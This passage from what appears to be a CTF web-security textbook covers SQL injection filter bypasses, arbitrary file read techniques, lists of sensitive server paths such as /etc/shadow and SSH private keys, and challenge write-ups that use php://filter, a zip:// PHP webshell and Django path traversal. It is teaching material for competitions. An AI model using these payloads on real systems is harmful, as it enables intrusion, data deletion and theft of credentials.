Most of the DELETE injections come after the WHERE keyword. Suppose the SQL statement is as follows.

$res = mysqli_query($conn, "DELETE FROM wp_news WHERE id = {$_GET['id']}");

The purpose of the DELETE statement is to delete all data from a table or the specified rows. Injecting the id parameter will inadvertently make the condition after WHERE True, resulting in the entire wp_news data being deleted, see Fig. 1.51.

Fig. 1.51
figure 51

Result

To ensure that there is no interference with normal data, it is common to use the 'and sleep(1)' method to ensure that the condition of WHERE is False, preventing the statement from being successfully executed, see Fig. 1.52.

Fig. 1.52
figure 52

Result

1.2.3 Injection and Defense

This section will cover common defenses and several ways to bypass them, focusing on providing readers with ideas for bypasses.

1.2.3.1 Character Substitution

In order to defend against SQL injection, some developers simply replace or block requests with keywords such as SELECT and FROM.

  1. 1.

    filter spaces

In addition to spaces, %0a, %0b, %0c, %0d, %09, %a0 (all URL-encoded, %a0 is only available in certain character sets) and /**/ combinations, parentheses, etc. can be substituted for spaces in the code. Suppose the PHP source code is as follows.

<?php $conn = mysqli_connect("127.0.0.1", "root", "root", "test"); $id = $_GET['id']; echo "before replace id: $id"; $id = str_replace(" ", "", $id); // Remove spaces echo "after replace id: $id"; $sql = "SELECT title, content FROM wp_news WHERE id=". $id; $res = mysqli_query($conn, $sql); $row = mysqli_fetch_array($res); echo "<center>"; echo "<h1>". $row['title']." </h1>"; echo "<br>"; echo "<h1>". $row['content']." </h1>"; echo "</center>"; ?>

The SQL query fails using the previous payload (see Fig. 1.53) because the space is stripped, and the title is not shown on the page. Replace the space in payload with “%09”. The result could be seen in Fig. 1.54.

Fig. 1.53
figure 53

Result

Fig. 1.54
figure 54

Result

  1. 2.

    filter SELECT

In the case of replacing SELECT with null, you can use a nested form, such as SESELECTLECT, which is filtered and then changed back to SELECT.

$id = str_replace(" ", "", $id);

Replace with

$id = str_replace("SELECT", "", $id);

Visit http://192.168.20.132/replace.php?id=-1%09union%09selselectect%091,2 and see Fig. 1.55 for the results.

Fig. 1.55
figure 55

Result

  1. 3.

    case matching

In MySQL, the keywords are not case sensitive, so if only “SELECT” is matched, it can be easily bypassed by using mixed case, such as “sEleCT”.

  1. 4.

    regular matching

The regular match keyword “\bselect\b” can be bypassed by using something like “/*!50000select*/”, see Fig. 1.56.

Fig. 1.56
figure 56

Result

  1. 5.

    replaced single or double quotation marks, forgot the backslash

When the following injection points are encountered.

$sql = "SELECT * FROM wp_news WHERE id = 'controllable 1' AND title = 'controllable 2'"

The following statements can be constructed to bypass the filter.

$sql = "SELECT * FROM wp_news WHERE id = 'a\' AND title = 'OR sleep(1)#'"

The backslash of the first controllable point escapes the single quotation mark preset by controllable point 1, causing controllable point 2 to escape the single quotation mark, see Fig. 1.57.

Fig. 1.57
figure 57

Result

As you can see, sleep() was successfully executed, indicating that the Controlled Point 2 location has successfully escaped the quotes. Sensitive information can be obtained using UNION injection, see Fig. 1.58.

Fig. 1.58
figure 58

Result

1.2.3.2 Escape Quotes

The critical point for the SQL injection is on escaping quotes, and developers often do “addslashes” of the user's input globally, i.e., slashing characters such as single quotes, backslashes, etc., such as “'” to “\'”. In this case, SQL injection may not seem to exist, but it can still be broken under certain conditions.

  1. 1.

    Encoding and Decoding

Developers often use decoding functions such as urldecode, base64_decode, or custom encryption/decryption functions. When the user enters the addslashes function, the data is encoded, and the quotes cannot be slashed, and if the input is combined directly with the SQL statement after decoding, SQL injection can be caused. The wide-byte injection is a classic case of injection caused by character set conversion. Interested readers can consult the relevant documents to learn more.

  1. 2.

    Unexpected input points

For example, in PHP, the developer usually forgets variables such as the name of the uploaded file, the HTTP header, and $_SERVER[‘PHP_SELF’]. Thus there are no filters to these variables, leading to injections.

  1. 3.

    secondary injection

The root cause of secondary injection is that the developer trusts that the data taken out of the database is harmless. Suppose the current data table is shown in Fig. 1.59, and the user name admin‘or’1 entered by the user is escaped as admin\‘or\’1, so the SQL statement is.

INSERT INTO wp_user VALUES(2, 'admin\'or\'1', 'some_pass');

Fig. 1.59
figure 59

Result

At this point, since the quotes are slashed, and no injection is generated, the data is banked normally, see Fig. 1.60.

Fig. 1.60
figure 60

Result

However, when this user name is used again (usually for session information), the following code is shown.

<?php $conn = mysqli_connect("127.0.0.1", "root", "root", "test"); $res = mysqli_query($conn, "SELECT username FROM wp_user WHERE id=2"); $row = mysqli_fetch_array($res); $name = $row["username"]; $res = mysqli_query($conn, "SELECT password FROM wp_user WHERE username='$name'"); ?>

When the name is combined into the SQL statement, it becomes as follows SQL statement to produce SQL injection.

SELECT password FROM wp_user WHERE username = 'admin' or'1';

  1. 4.

    String truncation

In header, title positions, etc., developers may limit headings to no more than 10 characters, beyond which they will be truncated. For example, the PHP code is as follows.

<?php $conn = mysqli_connect("127.0.0.1", "root", "root", "test"); $title = addslashes($_GET['title']); $title = substr($title1, 0, 10); echo "<center>$title</center>"; $content = addslashes($_GET['content']); $sql = "INSERT INTO wp_news VALUES(2, '$title', '$content')"; $res = mysqli_query($conn, $sql); ?>

Suppose an attacker enters “aaaaaaaaa'”, which is automatically slashed as “aaaaaaaaa\'” and intercepted as "aaaaaaaaa\" due to the character length limit, which escapes the previous single quotes so that it can be injected at the content place. Let us take the VALUES injection method and go to http://192.168.20.132/insert2.php?title=aaaaaaaaa'&content=,1,1),(3,4, (select% 20pwd%20from%20wp_user% 20limit%201),1)%23, you can see that two rows have been added to the data table wp_news, see Fig. 1.61.

Fig. 1.61
figure 61

Result

1.2.4 Impacts of Injection

We have covered the basics of SQL injection and ways to bypass it, so what are the impacts of injection? The following is a summary of the author's experience in the field.

  • If you have the write permission, you can use INTO OUTFILE or DUMPFILE to write directly to a web directory or write to a file and then combine it with a file including vulnerabilities to achieve code execution, see Fig. 1.62.

  • Use the load_file() function to read the source code and configuration information with file read permission to access sensitive data.

  • Elevate privileges, get higher user or administrator privileges, bypass logins, add users, adjust user permissions, etc., to have more management functionality on the target website.

  • Control the contents of files such as templates, caches, etc., to obtain permissions or delete or read specific critical files by injecting data from database queries.

  • Control the entire database, including arbitrary data, arbitrary field lengths, etc., when multiple statements can be executed.

  • System commands can be executed directly in a database such as SQL Server.

Fig. 1.62
figure 62

Result

1.2.5 SQL Injection Summary

This section introduces only some of the most straightforward points of the CTF, while the actual competition will combine many features and functions. MySQL injection challenges can use a variety of filtering methods, and due to the SQL server in the implementation, even the same function can be implemented in a variety of ways, and the challenges will include features that not be commonly used. Then, in order to solve the challenges or to better understand SQL injection principles, it is crucial to look for relevant information according to the different SQL server types, find out which fuzz methods filter out characters, functions, keywords, etc., look for alternatives in the document that have the same function but do not contain filtering keywords, and finally bypass the relevant defenses.

Some platforms like sqli-labs (https://github.com/Audi-1/sqli-labs) provide injection challenges with different filter levels, covering most challenge points. By practicing and summarizing, we can always find the necessary combinations to solve the challenges in the competition.

1.3 Arbitrary File Read Vulnerability

The so-called file reading vulnerability means that the attacker can read the file on the server that the developer does not allow the attacker to read through some means. From the perspective of the entire attack process, it is often used as a powerful supplementary method for asset information collection, various configuration files of the server, keys stored in the form of files, server information (including information about the processes being executed), historical commands, and network Information, application source code, and binary programs are all snooped by attackers at the trigger point of this vulnerability.

File reading vulnerabilities often mean that the attacker's server is about to be wholly controlled by the attacker. Of course, if the server is deployed strictly according to standard security specifications, even if there are exploitable file reading vulnerabilities in the application, it is difficult for an attacker to obtain valuable information. File reading vulnerabilities exist in almost every programming language in which web applications can be deployed. Of course, the “existence” here is not essentially a problem of the language itself but an omission caused by the developer’s insufficient consideration of unexpected situations when developing.

Generally speaking, developers of web application frameworks or middleware are very concerned about the reusability of the code, so the definition of some API interfaces is very open to giving maximum freedom to the secondary developers as much as possible. In real situations, many developers trust the security mechanism implemented by the web application framework or middleware layer too much during secondary development, and they recklessly rely on the security mechanism of the application framework and middleware without a careful understanding of the security mechanism. Simple API documentation is used for development. Unfortunately, Web application frameworks or middleware developers may not indicate the specific implementation principles of API functions, the range of acceptable parameters, and predictable security issues in the documentation.

The industry-recognized code base is usually called “wheels”, and programs can significantly reduce repetitive work using these “wheels”. If there are vulnerabilities in the “wheel”, the “wheel” code will be repeatedly reused by programmers multiple times at the same time, the vulnerabilities will also be passed level by level, and with the constant reference to the underlying “wheel” code, there will The security risks in the “wheel” code are almost invisible to developers at the top of the “call chain”.

It is also a severe challenge for security personnel to patiently trace the call chain backward to its root cause as they dig into web application framework vulnerabilities.

In addition, there is an arbitrary file reading vulnerability that developers cannot control through code. The vulnerability in this situation is often caused by the Web Server’s problems or insecure server configuration. The primary mechanism of Web Server operation is to read code or resource files from the server and then transfer the code files to the interpreter or CGI program for execution, and then feedback the execution results and resource files to the client user. The files that exist in it Many file operations are likely to be intervened by attackers, resulting in an unintended reading of files and incorrect use of code files as resource files.

1.3.1 Common Trigger Points for File Read Vulnerabilities

1.3.1.1 Web Application Languages

Different web languages have different trigger points for file reading vulnerabilities. This section takes different web file reading vulnerabilities as examples to introduce the specific vulnerability scenarios.

  1. 1.

    PHP

The part about file reading in the PHP standard functions will not be introduced in detail. These functions include but may not be limited to: file_get_ contents(), file(), fopen() functions (and file pointer manipulation functions fread(), fgets(), etc. ), functions related to file inclusion (include(), require(), include_once(), require_once(), etc.), and execute system commands for reading files through PHP (system(), exec(), etc.). These functions are very common in PHP applications, so during the entire PHP code audit process, these functions will be focused on by auditors.

Some readers here may have questions. Since these functions are so dangerous, why do developers pass input data dynamically to them as parameters? Because now PHP development technology is more and more inclined to single entry, multi-level, multi-channel mode, which involves intensive and frequent calls between PHP files. In order to write file functions with high reusability, the developer needs to pass in some dynamic information (such as the dynamic part of the file name) to those functions (see Fig. 1.63). If branch statements such as switch are not used to control the dynamically input data at the program entry, it is easy for an attacker to inject malicious paths, thereby achieving arbitrary file reading or even arbitrary file inclusion.

Fig. 1.63
figure 63

Code example

In addition to the standard library functions mentioned above, many common PHP extensions also provide functions that can read files. For example, the php-curl extension, PHP modules that involve file access operations(database-related extensions, image-related extensions), XML module which could lead XXE, etc. There are not many CTF challenges that use external library functions to read arbitrary files. The subsequent chapters will analyze the challenges involved with examples.

Unlike other languages, PHP lets users specify that the open file is not a simple path but a file stream. We can understand it as a set of protocols provided by PHP. For example, after entering http://host:port/xxx in the browser, you can request the corresponding file on the remote server through HTTP. In PHP, there are many protocols with different functions but similar forms, collectively called Wrapper. The most typical protocol is the php:// protocol. More interesting is that PHP provides an interface for developers to write custom wrappers (stream_wrapper_register).

In addition to Wrapper, another unique mechanism in PHP is Filter, whose function is to perform specific processing on the current Wrapper (such as changing the contents of the current file stream to uppercase).

For custom wrappers, Filter requires developers to register through stream_filter_register. Moreover, some built-in wrappers in PHP will come with filters, such as the php:// protocol. There are filters of the type shown in Fig. 1.64.

Fig. 1.64
figure 64

Filters

PHP's Filter feature provides us with many conveniences for reading arbitrary files. Assuming that the path parameter of the include function on the server-side is controllable, it will parse the target file as a PHP file under normal circumstances. If there are PHP-related tags such as “<?php” in the parsed file, the content in the tag will be executed as PHP code.

If we directly pass the file name of this file containing PHP code to the include function, the PHP code cannot be leaked in the form of visual text because the PHP code is executed. However, this can be avoided by using Filter at this time.

For example, the more common Base64-related Filter can encode the file stream into the form of Base64 so that there will be no PHP tags in the content of the read file. More serious is that if the remote file inclusion option allow_url_include is enabled on the server, we can directly execute remote PHP code.

Of course, these Wrapper and Filter carried by PHP by default can be disabled through php.ini. It is recommended to read the source code of PHP about Wrapper and Filter to gain a deeper understanding of the relevant content.

In the real-world problems encountered about the inclusion of PHP files, we may encounter three situations: ① The file path is controllable in the front and uncontrollable at the back; ② The file path is controllable at the back and uncontrollable in the front; ③ The file path is controllable in the middle.

For the first case, you can use "\x00" for truncation in lower PHP and container versions, and the corresponding URL encoding is “%00”. When there is a file upload function on the server, you can also use the zip:// or the phar:// protocol to include the file directly and execute the PHP code.

For the second case, we can use the symbol combo “../” for directory traversal to directly read the file, but in this case, Wrapper cannot be used. If the server uses include or other functions about file-including, we will not be able to read the PHP code in the PHP file.

The third case is similar to the first case, but Wrapper cannot be used for file inclusion.

  1. 2.

    Python

Unlike PHP, Python's web applications tend to start their services through their modules and then present the entire web application to the user with middleware and proxy services. The interaction between the user and the web application itself includes requests for server resource files, making it easy to read files unexpectedly. As a result, we see many arbitrary file-read vulnerabilities in a Python framework due to the lack of a unified standard for resource file interaction.

Vulnerabilities are often found in the section of the framework requesting a static resource file, i.e., the open function that reads the file's contents at the end, but they are often caused by framework developers ignoring the features of Python functions, such as os.path.join().

>>> os.path.join("/a","/b") '/b'

Many developers determine that the path passed by the user does not contain “.” to ensure that the user does not traverse the directory when reading resources and then substitute the user’s input into the second parameter of the os.path.join, but if the user passes Enter “/”, you can still traverse to the root directory, which will cause any file to be read.

In addition to the python framework being prone to such problems, many applications involving file operations are also likely to cause arbitrary file reading due to abuse of the open function and improper rendering of templates. For example, some data entered by the user is stored in the server as part of the file name (commonly used in authentication services or log services), and the processed user input data is also used as an index to find related files in the part of fetching the content of the file. This gives the attacker a way to perform directory traversal.

For example, in the CTF online competition, Python developers call an unsafe decompression module to decompress compressed files, which leads to directory traversal after the files are decompressed. Of course, the danger of directory traversal when decompressing files is to overwrite existing files on the server.

Another situation is that the attacker constructs a soft link and puts it into the compressed package. The decompressed content will directly point to the corresponding file on the server. When the attacker accesses the decompressed link file, the link will return to the corresponding content of the file. This will be analyzed in detail in the following chapters. Similar to PHP, some modules of Python may read files with XXE.

In addition, Python’s template injection, deserialization, and other vulnerabilities can cause arbitrary file reading to a certain extent. Of course, the most significant harm is still causing arbitrary command execution.

  1. 3.

    Java

In addition to the file reading caused by the function FileInputStream or XXE results, some Java modules also support the “file://” protocol, which is the place where any file is read the most in Java applications, such as Spring Cloud Config Server Path traversal and arbitrary file reading vulnerability (CVE-2019-3799), Jenkins arbitrary file reading vulnerability (CVE-2018-1999002), etc.

  1. 4.

    Ruby

Ruby's arbitrary file read vulnerability is commonly associated with the Rails framework in the CTF online competition. So far, the generic vulnerabilities known to us are Ruby On Rails Remote Code Execution (CVE-2016-0752), Ruby On Rails Path Traversal, and Arbitrary File Read (CVE-2018-3760), Ruby On Rails Path Traversal, and Arbitrary File Read (CVE-2019-5418). I have encountered the Ruby On Rails Remote Code Execution Vulnerability (CVE-2016-0752) in the CTF competition.

  1. 5.

    Node

At present, it is known that the express module of Node.js has an arbitrary file reading vulnerability (CVE-2017-14849), but the author has not encountered relevant CTF challenges. File reading vulnerabilities of Node in CTF are usually the template injection, code injection, etc.

1.3.1.2 Middleware/Server Related

Different middleware/servers may also have file reading vulnerabilities. This section uses file reading vulnerabilities on different middleware/servers as examples to introduce.

  1. 1)

    Nginx Error Configuration

File read vulnerabilities caused by Nginx misconfigurations are frequently found in CTF online competitions, especially when used with Python-Web applications. This is because Nginx is generally considered to be the best implementation of the Python-Web reverse proxy. However, its configuration file can easily cause serious problems if it is misconfigured. For example.

location /static { alias /home/myapp/static/; }

If the configuration file contains the above config option, maintenance or developers likely want the user to access the static directory (usually a static resource directory). However, if the web path requested by the user is /static./, splicing it into alias becomes /home/myapp/static/../, which will result in directory traversal, a directory traversal vulnerability is created and traverses to the myapp directory. At this point, an attacker can download Python source code and bytecode files at will. Note: The vulnerability is caused by the absence of the “/” restriction at the end of the location, allowing Nginx to match the path static and then splice the rest into an alias. /static.../, Nginx does not consider it a cross-directory but instead treats it as a complete directory name.

  1. 2)

    Database

Many databases can perform file reading operations, so let us take MySQL as an example.

MySQL’s load_file() function can read a file, but reading a file with the load_file() function first requires a database configuration with FILE permissions (which the database root user usually has), and second requires that the MySQL user/group executing the load_file() function has readable permissions to the target file (many of them). The configuration files are readable by all groups/users), and mainstream Linux systems also require Apparmor to configure a directory whitelist (by default, the whitelist is restricted to MySQL-related directories), which is a “lot of work”. Even with such strict exploit conditions, we often encounter file reading challenges in CTF online competitions.

There is another way to read a file, but unlike the load_file() file read function, this requires executing the complete SQL statement, i.e., load data infile. Again, this requires FILE privileges but is rare because, except in the particular case of SSRF attacks on MySQL, there are very few cases where the entire non-basic SQL statement can be executed directly.

  1. 3)

    soft links

The bash command ln -s creates a soft link file to the specified file and then uploads the soft link file to the server, and when we request access to the linked file again, we request the file it points to on the server.

  1. 4)

    FFmpeg

In June 2017, an arbitrary file read vulnerability was discovered in FFmpeg. A CTF online challenge was shown in the CISCN competition (see https://www cnblogs.com/iamstudy/articles/2017_quanguo_ctf_web_writeup.html for the writeups), which exploited this vulnerability.

  1. 5)

    Docker-API

Docker-API can control the behavior of Docker, generally communicating over UNIX sockets but also communicating directly over HTTP. When we encounter an SSRF vulnerability, especially if we can communicate with UNIX sockets via SSRF vulnerability, we can manipulate Docker-API to load local files into a new Docker container for reading (using Docker's ADD and COPY operations).

1.3.1.3 Client Related

There are also file read vulnerabilities on the client-side, primarily based on XSS vulnerabilities to read local files.

  1. 1)

    Browser/Flash XSS

Generally speaking, many browsers disable JavaScript operations related to reading local files, such as requesting a remote website, if their JavaScript code uses the File protocol to read a client's local files, which can fail due to the same origin strategy. However, operations in the browser development process can bypass these measures, such as a client-side local file read vulnerability in Safari, discovered in August 2017.

  1. 2)

    MarkDown Syntax Parser XSS

Similar to XSS, Markdown parsers also have some ability to parse JavaScript. However, most of these parsers do not restrict operations to local file reads as browsers do and rarely have similar safeguards as the same origin strategy.

1.3.2 Common Read Paths for File Read Vulnerabilities

1.3.2.1 Linux

  1. 1.

    flag name (relative path)

During the CTF competitions, sometimes we need to guess or fuzz the real flag file name. Please note the following file names and suffixes, and make your own decisions according to the challenge information and challenge environment.

.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /flag(.txt|.php|.pyc|.py...) /flag(.txt|.php|.pyc|.py ...) flag(.txt|.php|.pyc|.py ...) [dir_you_know]/flag(.txt|.php|.pyc|.py ...) ... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/flag(.txt|.php|.pyc|.py) /etc/flag(.txt|.php|.pyc|.py ...) ... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /tmp/flag(.txt|.php|.pyc|.py ...) ... /flag(.txt|.php|.pyc|.py ...) ... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /root/flag(.txt|.php|.pyc|.py ...) ... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /home/flag(.txt|.php|.pyc|.py) /home/flag(.txt|.php|.pyc|.py ...) ... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /home/[user_you_know /home/[user_you_know]/flag(.txt|.php|.pyc|.py ...)

  1. 2.

    server information (absolute path)

The following is a list of common parts of the CTF online competitions that you need to know. It is recommended that the reader go through these files after reading this book and learn about the common files not listed.

  1. (1)

    /etc directory

The /etc directory mainly contains various application or system configuration files, so its files are the primary targets for file reading.

  1. (2)

    /etc/passwd

The /etc/passwd file is a Linux system file that stores user information and their working directory, is readable by all users/groups, and is generally used as a baseline for determining the existence of file read vulnerabilities in a Linux system. Reading this file tells us which users exist on the system, what groups they belong to, and their working directory.

  1. (3)

    /etc/shadow

/etc/shadow is a Linux system file that stores user information and (possibly) passwords (hash). Only the root user/group could write to this file, and no user could read it except the root/shadow user, so it is generally not readable in CTF competitions.

  1. (4)

    /etc/apache2/*

/etc/apache2/* are the Apache configuration files that allow you to get information about web directories, service ports, etc. Some CTF challenges require you to leak the web path.

  1. (5)

    /etc/nginx/*

/etc/nginx/* is Nginx configuration files (for systems such as Ubuntu) that allow you to get information about web directories, service ports, and so on.

  1. (6)

    /etc/apparmor(.d)/*

/etc/apparmor(.d)/* is the Apparmor configuration file that can be used to get an allowlist or blocklist of system calls for each application. For example, you can read the configuration file to see if system calls are disabled by MySQL and thus determine if you can use UDF (User Defined Functions) to execute system commands.

  1. (7)

    /etc/(cron.d/*|crontab)

/etc/(cron.d/*|crontab) are cron files. Some CTF challenges will setup cron services, and reading these configuration files will reveal hidden directories or other files.

  1. (8)

    /etc/environment

/etc/environment is one of the environment variable configuration files. The environment variables may have many directory information leaked, and even a secret key may be leaked.

  1. (9)

    /etc/hostname

/etc/hostname represents the hostname.

  1. (10)

    /etc/hosts

/etc/hosts is a static table of hostname lookups that contains information about pairs of IP addresses for a given domain. With this file, CTF players could get network information and intranet IPs/domains.

  1. (11)

    /etc/issue

/etc/issue specifies the system version.

  1. (12)

    /etc/mysql/*

/etc/mysql/* are the MySQL configuration files.

  1. (13)

    /etc/php/*

/etc/php/* are the PHP configuration files.

  1. (14)

    /proc directory

The /proc directory usually stores various information about the dynamic running of the process and is essentially a virtual directory. Note: If you view the information of the non-current process, then PID can be brute-forced. If you want to view the current process, you only need to replace /proc/[pid]/ with /proc/self/.

The cmdline file in the corresponding directory can read more sensitive information, e.g., logging into MySQL using mysql -uxxx -pxxxx will display the plaintext password in the cmdline file.

/proc/[pid]/cmdline (points to the terminal command corresponding to the process)

Sometimes, we cannot get the current application's directory to jump directly to the current directory with the cwd command.

/proc/[pid]/cwd/ (points to the running directory of the process)

There may be a secret_key in the environment variable, which can also be read from the environ.

/proc/[pid]/environ (environment variables that points to the process runtime)

  1. (15)

    Other Catalogs

There may be other paths to the Nginx configuration file.

/usr/local/nginx/conf/* (source code installation or some other system)

Log files.

/var/log/* (Web applications that often have Apache 2 can read /var/log/apache2/access.log) (thus analyzing the logs and stealing other players' solution steps).

Apache Default Web Root.

/var/www/html/

PHP session directory.

/var/lib/php(5)/sessions/ (disclosure of user session)

User directory.

[user_dir_you_know]/.bash_history (Disclosure of History command) [user_dir_you_know]/.bashrc (Partial environmental variables) [user_dir_you_know]/.ssh/id_rsa(.pub) (ssh login private key/public key) [user_dir_you_know]/.viminfo (vim usage record)

Sometimes we want to read the executable file of the current application for analysis, but in practice there may be some security measures that prevent us from reading the executable file, in which case we can try to read /proc/self/exe.

/proc/[pid]/fd/(1|2...) (read stdout or stderrror or whatever that [pid] points to the process) /proc/[pid]/maps ([pid] memory map to the process) /proc/[pid]/(mounts|mountinfo) CTF is commonly found in Docker environments. (In this case, mounts reveal some sensitive paths). /proc/[pid]/net/* ([pid] points to the network information of the process, e.g. reading TCP will get the TCP port to which the process is bound) (ARP will leak intranet IP information on the same segment)

1.3.2.2 Windows

The Windows web application arbitrary file read vulnerability is not common in CTF challenges, but there is a problem when Windows is used with PHP: it is possible to use symbols such as “<” as wildcards to read files without knowing the full file name. The contents are described in detail in the following examples.

1.3.3 File Read Vulnerability Example

Based on a large number of relevant CTF real challenges, this section introduces real-world cases of file reading vulnerabilities.

1.3.3.1 Soldiers Are Tricky (HCTF 2016)

【Intro】The first half of the path argument passed to the include function can be controlled by an attacker, the second half of the content is determined, and the uncontrollable part is the .php suffix.

... $fp = empty($_GET['fp']) ? 'fail' : $_GET['fp']; if(preg_match('/\. \cr. /', $fp)){ die('No No No!'); } if(preg_match('/rm/i', $_SERVER["QUERY_STRING"]){ die(); } ... if($fp ! == 'fail') { if(! (include($fp.'.php'))) {

There is a file upload function in the upload.php, but the file's name uploaded to the server is not controlled.

... // function.php function create_imagekey(){ return sha1($_SERVER['REMOTE_ADDR']. $_SERVER['HTTP_USER_AGENT'].time().mt_rand()); } ... //upload.php $imagekey = create_imagekey(); move_uploaded_file($name, "uploads/$imagekey.png"); echo "<script>location.href='?fp=show&imagekey=$imagekey'</script>"; ...

【Difficulty】 Moderate.

【Knowledge】 Filter utilization of php:// protocol; file inclusion via zip:// protocol.

【Challenge solving】 Start the challenge, find only one upload form on the home page, first upload a normal file for testing. By hijacking local network packages, we found that the POST data is transferred to “/?fp=upload”, then follow the package flow, we will find the result jump to “/?fp=show&imagekey=xxx”. ”.

From there, the direction of thinking will vary for players with different levels of experience.

  1. (1)

    Step 1

Novice players: Continue to test the file upload function.

Experienced players: Seeing the fp argument, they associate it with a file pointer, i.e., the value of fp may be related to a file.

  1. (2)

    Step 2

Novice players: How could I bypass the file upload protection mechanism?

Experienced players: go directly to show.php, upload.php, or try to find a PHP file with a name that has the special meaning of show or upload, or change show/upload to another known file named “home”.

For more experienced players: change the content of the fp parameter to “./show” “.. /html/show”, etc. We cannot know the exact path of the target file it contains, and if it is a strange path, we cannot find the original PHP file, so the “ ./show” format is a good solution to this problem makes it easy to determine if there is an arbitrary file inclusion vulnerability.

  1. (3)

    Step 3

Novice players: This challenge must require 0day to bypass the protection. II should give up.

Experienced players: According to the results of directly accessing “show.php/upload.php” and “?fp=home”, it is judged that there is a file inclusion vulnerability. Use the Filter mechanism to construct attack data like “php://filter/convert.base64-encode/resource=xxx”. Read files and get the source code of various files; use the zip:// protocol with the uploaded Zip File, including a compressed Webshell file; then call the Webshell in the compressed package through the zip:// protocol, and the link to access this Webshell is

?fp=zip://uploads/fe5e1c43e6e6bcfd506f0307e8ed6ec7ecc3821d.png%231&shell=phpinfo(); fe5e1c43e6e6bcfd506f0307e8ed6ec7ecc3821d.png (zipfile) 1.php (phpfile) => "<?php eval($_GET['shell']);?>"

  • 【Summary】 ① The challenge first examines the player's ability to find any file reading/including related vulnerabilities through black-box testing. Everyone has their own unique testing method. The ideas written above are for reference only. When conducting black-box testing, we must capture the keywords in the parameters and have a certain association ability.

  • ② Examine the use of Filter by players, such as php://filter/convert.Base64-encode (encode the file stream through Base64).

  • ③ Examined the players’ use of the zip:// protocol: Treat the file stream as a Zip file stream, and use “#” (%23) to select the file stream of the specified file in the compressed package.

You may not understand point ③, but here is the explanation. When we upload a Zip file to the server when the zip file is parsed using the zip:// protocol, the Zip file is automatically parsed according to its file structure, and then the Zip file is indexed by “# (corresponding URL code %23) +filename”. (In the example above, a file named 1.php is stored internally. In this case, the entire file stream is localized to 1.php, so the include contents are the contents of 1.php, as shown in Fig. 1.65.

Fig. 1.65
figure 65

Execution process

1.3.3.2 PWNHUB-Classroom

【Intro】 Develop with the Django framework and configure a static resource directory in an insecure way.

#urls.py from django.conf.urls import url from.import views urlpatterns = [url('^$', views.IndexView.as_view(), name='index'), url('^login/$', views.LoginView.as_view(), name='login'), url('^logout/$', views.LogoutView.as_view(), name='logout'), url('^static/(?P<path>.*)', views.StaticFilesView.as_view(), name='static')] ... ##views.py ... class StaticFilesView(generic.View): content_type = 'text/plain' def get(self, request, *args, **kwargs): filename = self.kwargs['path'] filename = os.path.join(settings.BASE_DIR, 'students', 'static', filename) name, ext = os.path.splitext(filename) if ext in ('.py', '.conf', '.sqlite3', '.yml'): raise exceptions.PermissionDenied('Permission deny') try: return HttpResponse(FileWrapper(open(filename, 'rb'), 8192), content_type=self.content_type) except BaseException as e: raise Http404('Static file not found') ...

【Difficulty】 Moderate.

【Knowledge】 Python (Django) file read vulnerability caused by static resource configuration error; Pyc bytecode file decompilation; Django framework ORM injection.

【Challenge solving】 The first vulnerability: The code first matches the content after the URL path static/ passed in by the user, and then passes this content to os.path.join, and forms an absolute path after splicing with some system default directories, and then performs the suffix name Check, after checking, the absolute path will be passed into the open() function, read the file content and return to the user.

The second vulnerability is in the views.py class LoginView. As you can see, after loading the JSON data passed by the user, the loaded data is directly passed into the x.objects.filter (a native Django ORM function).

... class LoginView(JsonResponseMixin, generic.TemplateView): template_name = 'login.html' def post(self, request, *args, **kwargs): data = json.loads(request.body.decode())) stu = models.Student.objects.filter(**data).first() if not stu or stu.passkey ! = data['passkey']: return self._jsondata('', 403) else: request.session['is_login'] = True return self._jsondata('', 200) ...

Open the challenge link first and could see the Server information displayed in the HTTP response header.

Server: gunicorn/19.6.0 Django/1.10.3 CPython/3.5.2

We can know that Python's Django framework develops the challenge. When encountering a situation where the source code is not provided in the Python challenges, we can first try whether there are vulnerabilities related to directory traversal (maybe Nginx insecure configuration or Python framework insecure configuration), here use “/etc/passwd” as an examination for file reading, and the requested path is:

/static/../../../../../../etc/passwd

It can be found that any file reading vulnerability does exist, but when trying to read Python source code files, it is found that the server has filtered several common file extensions, including Python extensions, configuration file extensions, Sqlite file extensions, and YML. File extension:

if ext in ('.py', '.conf', '.sqlite3', '.yml'): raise exceptions.PermissionDenied('Permission deny')

Is there any other way to get the source code? When you run a Python file in Python 3, the running module is cached and stored in the __pycache__ directory, where the pyc bytecode file is named as follows.

[module_name]+".cpython-3"+[\d](python3 minor version number) + ".pyc"

__pycache__/views.cpython-34.pyc is an example of a filename. Thus, we could get those cache files to get the source codes.

Replace the exploit path as follows.

/static/.. /__pycache__/urls.cpython-35.pyc

Now we successfully read the PYC bytecode file. Read all the remaining PYC files and then decompile the PYC bytecode file to get the source code. By reviewing the obtained source code, we found an ORM injection vulnerability, which can be exploited to obtain the flag content. See Fig. 1.66.

Fig. 1.66
figure 66

Get flag

  • 【Summary】 ① CTF players need to judge the challenge’s environment through the fingerprint information in the HTTP header. Of course, some experience and skills may be involved here, which need to be accumulated through practice.

  • ② Should be familiar with the environment and web application framework used by CTF challenge. Even if CTF players are unfamiliar initially, they must quickly build and learn the characteristics of the environment and framework or look through the manual. Note: Quickly setting up an environment and learning features is the basic ability of CTF players to solve Web challenges.

  • ③ Able to find a directory traversal vulnerability through black-box testing and then use this vulnerability to read arbitrary files.

  • ④ Source code audit, according to ②, after understanding the characteristics of the framework, the flag is obtained through ORM injection.

1.3.3.3 Show Me the Shell I(TCTF/0CTF 2018 Final)

【Intro】 The vulnerability of the challenge is obvious. The UpdateHead function is the function of updating the avatar. The protocol of the URL passed by the user can be the File protocol, and then the arbitrary file reading vulnerability of the URL component is triggered in the Download function.

